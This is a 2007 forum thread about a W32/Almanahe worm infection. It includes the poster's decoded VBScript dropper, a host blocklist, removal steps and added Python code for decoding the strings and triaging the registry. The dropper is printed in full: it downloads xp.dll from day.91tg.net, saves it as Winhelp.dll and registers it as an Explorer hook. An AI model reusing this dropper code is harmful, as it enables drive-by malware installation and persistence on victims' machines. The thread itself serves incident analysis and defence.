Network Disconnection problems? might be NASTY VIRUS!

Started by Darren Dirt, June 05, 2007, 11:01:04 AM


Darren Dirt

W32/Almanahe.c
http://vil.nai.com/vil/content/v_142394.htm


also see:
W32/Almanahe.a
http://vil.nai.com/vil/content/v_142021.htm



and W32/Almanahe.b is apparently out too



- - -

in a nutshell dammit I am pissed. I got a new machine here at work a few months ago, it's WinXP, and looks like this bugger spreads through network shares or something, especially on XP.

I run Windoze Update a lot, but apparently it's like a very very recent evil creature.


Every few hours I would have to disable-reenable my network connection, then all would be fine. Today it got to almost every 5 minutes.

I am not joking.

So if you're experiencing similar, then good luck. Looks like the antivirus programs are only TODAY finally mentioning it on their sites (I had searched for "sb941.com" even yesterday, no hits until today).

BTW the sign of infection: if you do a view-source in your browser (IE or Firefox both) you'll notice in the first line the following:

<script src="http://sb.sb941.com/k.js" type="text/javascript"></script>   

or

<script src="http://k.sb941.com/k.js" type="text/javascript"></script>   


When I realized this, I of course checked out the .JS file. NASTY.

Technical vomitage follows.



function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=sunun;expires="+ Then.toGMTString();
}
}Get();


I checked out what it is trying to "Execute" and looks like it does some home-phoning etc.



' Plain base64 decoder with a home-grown alphabet; every string passed to it below is hidden this way
Function LeoFunc(ByVal encodeString)
    Const Templete = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    Dim dataLength, sOut, groupBegin
    encodeString = Replace(encodeString, vbCrLf, "")
    encodeString = Replace(encodeString, vbTab, "")
    encodeString = Replace(encodeString, " ", "")
    dataLength = Len(encodeString)
    If dataLength Mod 4 <> 0 Then
        Exit Function
    End If
    For groupBegin = 1 To dataLength Step 4
        Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
        numDataBytes = 3
        nGroup = 0
        For CharCounter = 0 To 3
            thisChar = Mid(encodeString, groupBegin + CharCounter, 1)
            If thisChar = "=" Then
                numDataBytes = numDataBytes - 1
                thisData = 0
            Else
                thisData = InStr(1, Templete, thisChar, vbBinaryCompare) - 1
            End If
            If thisData = -1 Then
                Exit Function
            End If
            nGroup = 64 * nGroup + thisData
        Next
        nGroup = Hex(nGroup)
        nGroup = String(6 - Len(nGroup), "0") & nGroup
        pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + Chr(CByte("&H" & Mid(nGroup, 3, 2))) + Chr(CByte("&H" & Mid(nGroup, 5, 2)))
        sOut = sOut & Left(pOut, numDataBytes)
    Next
    LeoFunc = sOut
End Function

On Error Resume Next
' Creates an <object> element with the decoded classid and uses its CreateObject to instantiate the components below
Set obj = document.createElement(LeoFunc("b2JqZWN0"))
obj.setAttribute LeoFunc("Y2xhc3NpZA=="), LeoFunc("Y2xzaWQ6QkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0EtMDBDMDRGQzI5RTM2")
' Microsoft.XMLHTTP: fetch http://day.91tg.net/xp.dll
set objD=obj.CreateObject(LeoFunc("TWljcm9zb2Z0LlhNTEhUVFA="),"")
urlPathName=LeoFunc("aHR0cDovL2RheS45MXRnLm5ldC94cC5kbGw=")
objD.Open LeoFunc("R0VU"),urlPathName,False
objD.Send
' Scripting.FileSystemObject: the target path is <Windows folder>\Winhelp.dll
set objB=obj.CreateObject(LeoFunc("U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q="),"")
set shell=objB.GetSpecialFolder(0)
shellName= objB.BuildPath(shell,LeoFunc("V2luaGVscC5kbGw="))
' Adodb.Stream: write the downloaded bytes to that file
set objStream=obj.CreateObject(LeoFunc("QWRvZGIuU3RyZWFt"),"")
With objStream
    .Type=1
    .Open
    .Write objD.responseBody
    .SaveToFile shellName,2
    .Close
End With
' WScript.Shell: register the DLL as COM class {6B3FCDC8-...} and hook it into Explorer via ShellExecuteHooks
Set objR = obj.CreateObject(LeoFunc("V1NjcmlwdC5TaGVsbA=="),"")
keyName=LeoFunc("SEtMTVxTT0ZUV0FSRVxDbGFzc2VzXENMU0lEXHs2QjNGQ0RDOC1FNUM3LTQ3N2EtODE3RS03Mjg2NUE3NzU4QUV9XA==")
objR.RegWrite keyName,LeoFunc("V2ViIEhvb2tz")
keyName=keyName & LeoFunc("SW5wcm9jU2VydmVyMzJc")
keyNameEx=LeoFunc("SEtMTVxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxTaGVsbEV4ZWN1dGVIb29rc1x7NkIzRkNEQzgtRTVDNy00NzdhLTgxN0UtNzI4NjVBNzc1OEFFfQ==")
objR.RegWrite keyName,shellName
objR.RegWrite keyName & LeoFunc("VGhyZWFkaW5nTW9kZWw="),LeoFunc("QXBhcnRtZW50")
objR.RegWrite keyNameEx,""




here are the encoded values it uses...

b2JqZWN0  ->  object
Y2xhc3NpZA==  ->  classid
Y2xzaWQ6QkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0EtMDBDMDRGQzI5RTM2
    ->  clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
TWljcm9zb2Z0LlhNTEhUVFA=  ->  Microsoft.XMLHTTP
aHR0cDovL2RheS45MXRnLm5ldC94cC5kbGw=  ->  http://day.91tg.net/xp.dll
R0VU  ->  GET
U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q=  ->  Scripting.FileSystemObject
V2luaGVscC5kbGw=  ->  Winhelp.dll
QWRvZGIuU3RyZWFt  ->  Adodb.Stream
V1NjcmlwdC5TaGVsbA==  ->  WScript.Shell
SEtMTVxTT0ZUV0FSRVxDbGFzc2VzXENMU0lEXHs2QjNGQ0RDOC1FNUM3LTQ3N2EtODE3RS03Mjg2NUE3NzU4QUV9XA==
    ->  HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
V2ViIEhvb2tz  ->  Web Hooks
SW5wcm9jU2VydmVyMzJc  ->  InprocServer32\
SEtMTVxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxTaGVsbEV4ZWN1dGVIb29rc1x7NkIzRkNEQzgtRTVDNy00NzdhLTgxN0UtNzI4NjVBNzc1OEFFfQ==
    ->  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
VGhyZWFkaW5nTW9kZWw=  ->  ThreadingModel
QXBhcnRtZW50  ->  Apartment

_____________________

Strive for progress. Not perfection.
_____________________
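
As an added example that is not part of the original post, this Python port of the dropper's LeoFunc routine rebuilds the encoded/decoded table above without executing any of the script, and cross-checks that the routine is plain base64 behind a home-grown alphabet table. The list of encoded strings is copied from the decoded VBScript; nothing else is assumed.

```python
import base64

# Added example, not code from the thread: a Python port of the dropper's
# LeoFunc routine so its hidden strings can be recovered without running it.
TEMPLATE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Encoded strings copied from the decoded VBScript in the post above
DROPPER_STRINGS = [
    "b2JqZWN0", "Y2xhc3NpZA==", "TWljcm9zb2Z0LlhNTEhUVFA=", "R0VU",
    "aHR0cDovL2RheS45MXRnLm5ldC94cC5kbGw=", "V2luaGVscC5kbGw=",
    "QWRvZGIuU3RyZWFt", "V1NjcmlwdC5TaGVsbA==", "V2ViIEhvb2tz",
    "SW5wcm9jU2VydmVyMzJc", "VGhyZWFkaW5nTW9kZWw=", "QXBhcnRtZW50",
]

def leofunc(encoded: str) -> str:
    """Mirror the VBScript step for step, quirks included: CRLF, tabs and
    spaces are stripped; a length not divisible by 4 or a character outside
    the table hits Exit Function before LeoFunc = sOut, so the result is ""."""
    s = encoded.replace("\r\n", "").replace("\t", "").replace(" ", "")
    if len(s) % 4 != 0:
        return ""
    out = bytearray()
    for group_begin in range(0, len(s), 4):
        num_data_bytes = 3           # bytes carried by this 4-char group
        n_group = 0                  # 24-bit accumulator, like nGroup
        for ch in s[group_begin:group_begin + 4]:
            if ch == "=":
                num_data_bytes -= 1  # each '=' pad drops one output byte
                this_data = 0
            else:
                this_data = TEMPLATE.find(ch)  # InStr(...) - 1
                if this_data == -1:
                    return ""
            n_group = 64 * n_group + this_data
        # The script formats nGroup as six hex digits and reads them back two
        # at a time; that is just a big-endian split into three bytes.
        out += n_group.to_bytes(3, "big")[:num_data_bytes]
    # VBScript's Chr() is codepage dependent above 127; latin-1 keeps the raw
    # byte values, which is exact for the ASCII-only strings used here.
    return out.decode("latin-1")

def decode_all(strings=DROPPER_STRINGS) -> dict:
    """Rebuild the encoded -> decoded table from the post."""
    return {e: leofunc(e) for e in strings}

def matches_stdlib(encoded: str) -> bool:
    """Cross-check: despite the custom table, LeoFunc is standard base64."""
    return leofunc(encoded) == base64.b64decode(encoded).decode("latin-1")
```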

Darren Dirt

yay, our antivirus (Trend Micro) finally has updated their website: they call it "PE_CORELINK.C" instead of Almanahe.c :p

Darren Dirt

btw if any of your guys' "shops" have a major network lag due to infection, here are a bunch of host names which you might want to have blocked to reduce the traffic.

Almanahe ".c" variant (the "June 3rd" discovery, although experienced painfully by Darren a few days earlier dammit) official McAfee site mentions these...

kr.sb941.com
k.sb941.com
info.sb941.com
down.91tg.net


a couple of others that I had found via my own decrypting of the .JS code:

sb.sb941.com
day.91tg.net



also the Almanahe ".a" variant:
pic.imrw0rldwide.com
soft.imrw0rldwide.com
tj.imrw0rldwide.com


Thorin

Quote from: Darren Dirt on June 05, 2007, 11:01:04 AM
W32/Almanahe.c
http://vil.nai.com/vil/content/v_142394.htm

I got a new machine here at work a few months ago, it's WinXP, and looks like this bugger spreads through network shares or something, especially on XP.

Looks nasty, alright. However, they don't really explain how it spreads:
Quote
"It's a polymorphic parasitic worm that infects Win32 executable files (*.exe)"
That doesn't really tell me how it gets activated to begin with. Does it come in as an attachment on an email? Does it search for and find open ports on networks and then execute itself? That would be useful information for those that are looking to avoid it...
Prayin' for a 20!

gcc thorin.c -pedantic -o Thorin
compile successful

Darren Dirt

network shares.

Quote
[04:55:05 PM Today -- This message has been bcc'd to all staff]

What has Happened
It has been identified that the problems we are currently experiencing with the ITS Infrastructure have been caused by a Trojan Virus outbreak.

What does this mean to you?
ITS continues to work on resolving these virus issues but the AF network has now been stabilized. 

What we are doing to correct this.
The websites that were propagating the virus have been blocked, which contributed to the stabilization of our Network.
We are working with the Anti-Virus vendor to create a new signature file to solve this virus issue.  We will keep you updated.


Yes, that's right, end of day and still not "resolved" :o

Thorin

Yes, once running it searches for executables to infect on the local machine and on all network shares the local machine has access to.  What I was asking is do we know how it starts running?  Does it come as an email attachment that needs to be opened for it to run?  Is it a malicious website that you have to visit for it to run?  Is it able to send remote procedure calls to your computer through a hitherto-unknown open port to accept and run itself?

Darren Dirt

I am presuming it's something along the lines of the latter, since I never opened any attachment or questionable executable in the last few weeks, yet I was infected with my XP at work (not at home though, thankfully -- hooray for decent firewall settings).

I'm guessing it's a hole in XP that has not been patched yet by MS and has been known in the hacker community for only a few weeks.

Mr. Analog

By Grabthar's Hammer

mgonce

Trend Micro identifies it as PE_CORELINK.A-O (http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE%5FCORELINK%2EA&VSect=P)
here are the manual removal instructions:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_CORELINK.A-O&VSect=Sn

Removing Autostart Key from the Registry

Removing autostart key from the registry prevents the automatic execution of the malware for which the said key was created.

If the registry key below is not found, the malware may not have executed as of detection. If so, proceed to the succeeding solution set.

Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
In the left panel, double-click the following:
HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet
Still in the left panel, locate and delete the key:
RioDrvs
Close Registry Editor.
Deleting the Malware File(s)

Right-click Start then click Search... or Find..., depending on the version of Windows you are running.
In the Named input box, type the name(s) of the file(s) detected earlier.
In the Look In drop-down list, select My Computer, then press Enter.
Once located, select the file then press SHIFT+DELETE.

Good luck
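
The Trend Micro steps above cover the RioDrvs autostart key; the VBScript dropper decoded earlier in the thread also registers its own CLSID under Explorer's ShellExecuteHooks, which is worth checking on a machine that was infected. As an added example that is not part of this post, the Python below triages a `reg export` text dump for that hook. The export is constructed: the CLSID, the `Web Hooks` name, `InprocServer32` and `ThreadingModel=Apartment` come from the thread's decoding, while the DLL path under the Windows folder and the benign placeholder CLSID are assumptions.

```python
import re
from typing import Dict, List

# Added example, not from the thread: triage a `reg export` text dump for the
# persistence the decoded dropper sets up (a ShellExecuteHooks CLSID whose
# InprocServer32 points at the dropped DLL).
HOOKS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
CLSID_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID"

# Constructed export: CLSID, value names and "Web Hooks" come from the thread's
# decoding; the DLL path (Windows folder) and the benign placeholder are made up.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{6B3FCDC8-E5C7-477a-817E-72865A7758AE}"=""
"{00000000-PLACEHOLDER-BENIGN-HOOK}"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
@="Web Hooks"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\InprocServer32]
@="C:\\WINDOWS\\Winhelp.dll"
"ThreadingModel"="Apartment"
"""

def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Map each [key] to its string values; "" holds the default (@) value."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        key = re.match(r"^\[(.+)\]$", line.strip())
        if key:
            current = key.group(1)
            keys[current] = {}
            continue
        val = re.match(r'^(?:@|"([^"]*)")="(.*)"$', line.strip())
        if val and current is not None:   # dword:/hex: values are skipped
            keys[current][val.group(1) or ""] = val.group(2).replace("\\\\", "\\")
    return keys

def suspicious_hooks(keys: Dict[str, Dict[str, str]], allowlist=()) -> List[dict]:
    """Explorer loads every CLSID named under ShellExecuteHooks into its own
    process; resolve each to its server DLL and flag any not on the allowlist."""
    allow = {c.upper() for c in allowlist}
    findings = []
    for clsid in keys.get(HOOKS_KEY, {}):
        if clsid.upper() in allow:
            continue
        server = keys.get(CLSID_ROOT + "\\" + clsid + "\\InprocServer32", {})
        name = keys.get(CLSID_ROOT + "\\" + clsid, {}).get("", "")
        findings.append({"clsid": clsid, "name": name, "dll": server.get("", ""),
                         "threading": server.get("ThreadingModel", "")})
    return findings
```

On a live system the same logic applies to the output of `reg export` for those two keys; anything it flags should be matched against the DLL the antivirus vendor names before deleting.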

Darren Dirt

QUICK HEADS-UP WARNING: for some reason FIREFOX freezes up when trying to view this thread (!?) but IE seems okay with it... Not sure if it's something to do with the content, or The Computer Gods are trying to be ironic... (But it finally opens after about 30 seconds :p )


PS: all the major anti-virus programs seem to have their DAT files updated and nicely clean infected machines. Presuming your organization's staff actually keep things up to date ;) So prolly no need to go into the registry yourself (since there's multiple keys that might have to be removed...)


Lazybones

I have no trouble opening this thread with FF. Try disabling some extensions and try again.

Mr. Analog

I have no trouble with this thread either. Also, welcome to the madness mgonce...